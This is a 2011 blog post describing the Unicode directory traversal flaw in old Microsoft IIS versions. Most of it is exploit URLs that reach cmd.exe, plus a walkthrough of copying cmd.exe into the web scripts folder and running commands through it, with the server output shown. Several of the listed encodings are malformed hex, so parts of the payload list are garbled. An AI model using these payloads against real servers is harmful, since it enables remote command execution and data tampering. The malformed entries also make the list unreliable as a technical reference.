Tuesday, 3 May 2011

Web Server Security - Exploiting IIS

Exploiting IIS
The main security functions of a web server is to restrict user requests so they can only access files within the web folders. Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended Unicode character representations are used in substitution for "/" and "\". This vulnerability provides a way for a malicious user to provide a special URL to the web site that will access any files whose name and location he knows, and which is located on the same logical drive as the web folders. This would potentially enable a malicious user who visited the web site to gain additional privileges on the machine - specifically, it could be used to gain privileges commensurate with those of a locally logged-on user. Gaining these permissions would enable the attackers to add, change or delete data, run code already on the server, or upload new code.
-Example 1-
For example lets look on this good link.
[protocol]://site/scripts/..%c1%1c../path/file.ext
* I am using [protocol] to display HTTP. *
[protocol]://site/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
[protocol]://site/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
[protocol]://site/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

-Example 1-
This exploit shows how an attacker can execute commands using a redirect on the target host.
First the attacker copies ".. \..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"
Then changes the command to the valid URL.
[protocol]://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
Vulnerable IIS returns: "CGI Error ... 1 file(s) copied."
The specified CGI application does not return a complete set of HTTP headers. Instead it returns the above error.
Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa" along with the URL to list the directory contents.
[protocol]://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
Vulnerable IIS returns:
" Directory of c: \inetpub\scripts
month/day/year [Time]





.
month/day/year [Time]
..
month/day/year [Time] 6 aaa
month/day/year [Time] a 236,304 cmd1.exe
..
abc
"

No comments:

Post a Comment